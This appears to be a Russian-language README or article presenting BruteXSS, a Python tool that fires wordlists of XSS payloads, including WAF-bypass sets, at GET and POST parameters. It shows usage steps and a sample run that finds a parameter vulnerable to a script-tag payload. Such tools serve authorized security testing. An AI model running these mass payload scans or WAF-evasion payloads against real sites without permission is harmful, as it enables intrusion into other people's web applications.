Надеемся, что многие читатели знакомы с тестированием XSS. Однако эффективное создание нагрузки — это повторяющаяся и трудоёмкая задача. В данной статье представлен автоматический инструмент для внедрения XSS, который позволяет также настраивать атакующую нагрузку. Эти нагрузки могут составлять от десятков до сотен, а иногда и тысяч записей. Этот скрипт также включает в себя ряд методов для обхода различных WAF.
BruteXSS является мощным и быстрым инструментом для проведения массовых атак через XSS. Он используется для массового внедрения одного параметра. BruteXSS загружает множество действительных нагрузок из заранее указанных словарей и использует эти нагрузки для проверки параметров на уязвимость XSS. Благодаря очень мощной функции сканирования, BruteXSS при выполнении задачи демонстрирует высокую точность и минимальное количество ложноположительных срабатываний. BruteXSS поддерживает запросы типа POST и GET, что делает его подходящим для современных веб-приложений.
root@kali:~/Desktop/BruteXSS# python brutexss.py -h
wordlist.txt
, wordlist-small.txt
, wordlist-medium.txt
, wordlist-huge.txt
.wordlist.txt
— приблизительно 20 часто используемых фраз, которые позволяют провести базовое сканирование XSS.
wordlist-small.txt
— приблизительно 100 фраз, которые позволяют провести более полное сканирование XSS.
wordlist-medium.txt
— приблизительно 200 фраз, которые позволяют провести сканирование XSS с обходом WAF.
wordlist-huge.txt
— приблизительно 5000 фраз, которые позволяют провести максимально полное сканирование XSS с обходом WAF.
КОМАНДА: python brutexss.py
МЕТОД: g
URL: http://www.site.com/?parameter=value
WORDLIST: wordlist.txt
#### 2 Метод POST
КОМАНДА: python brutexss.py
МЕТОД: p
URL: http://www.site.com/file.php
POST ДАННЫЕ: parameter=value¶meter1=value1
WORDLIST: wordlist.txt
____ _ __ ______ ____
| __ ) _ __ _ _| |_ ___ \ \/ / ___/ ___|
| _ \| '__| | | | __/ _ \ \ /\___ \___ \
| |_) | | | |_| | || __/ / \ ___) |__) |
|____/|_| \__,_|\__\___| /_/\_\____/____/
BruteXSS - Инструмент брутфорса для XSS
Автор: Шоуар Кхан - https://shawarkhan.com
Выберите метод: [П]олучение или [О]тправка (П/О): п
[?] Введите URL:
[?] > http://site.com/file.php
[+] Проверка доступности site.com...
[+] Site.com доступна! Отлично!
[?] Введите данные POST запроса: > параметр=значение&параметр1=значение1
[?] Введите расположение словаря (Нажмите Enter для использования по умолчанию wordlist.txt)
[?] > wordlist.txt
[+] Используется словарь по умолчанию...
[+] Загрузка полезной нагрузки из указанного словаря...
[+] Загружено 25 полезных нагрузок...
[+] Внедрение полезных нагрузок...
[+] Тестирование параметра 'параметр'...
[+] 2 / 25 полезных нагрузок внедрены...
[!] Найдена уязвимость XSS!
[!] Параметр: параметр
[!] Полезная нагрузка: "><script>prompt(1)</script>
[+] Тестирование параметра 'параметр1'...
[+] 25 / 25 полезных нагрузок внедрены...
[+] Параметр 'параметр1' не является уязвимым.
[+] 1 параметр уязвим к XSS.
+----+--------------+----------------+
| Id | Параметры | Состояние |
+----+--------------+----------------+
| 0 | параметр | Уязвимый |
+----+--------------+----------------+
| 1 | параметр1 | Не уязвимый |
+----+--------------+----------------+
Вы можете оставить комментарий после Вход в систему
Неприемлемый контент может быть отображен здесь и не будет показан на странице. Вы можете проверить и изменить его с помощью соответствующей функции редактирования.
Если вы подтверждаете, что содержание не содержит непристойной лексики/перенаправления на рекламу/насилия/вульгарной порнографии/нарушений/пиратства/ложного/незначительного или незаконного контента, связанного с национальными законами и предписаниями, вы можете нажать «Отправить» для подачи апелляции, и мы обработаем ее как можно скорее.
Комментарии ( 0 )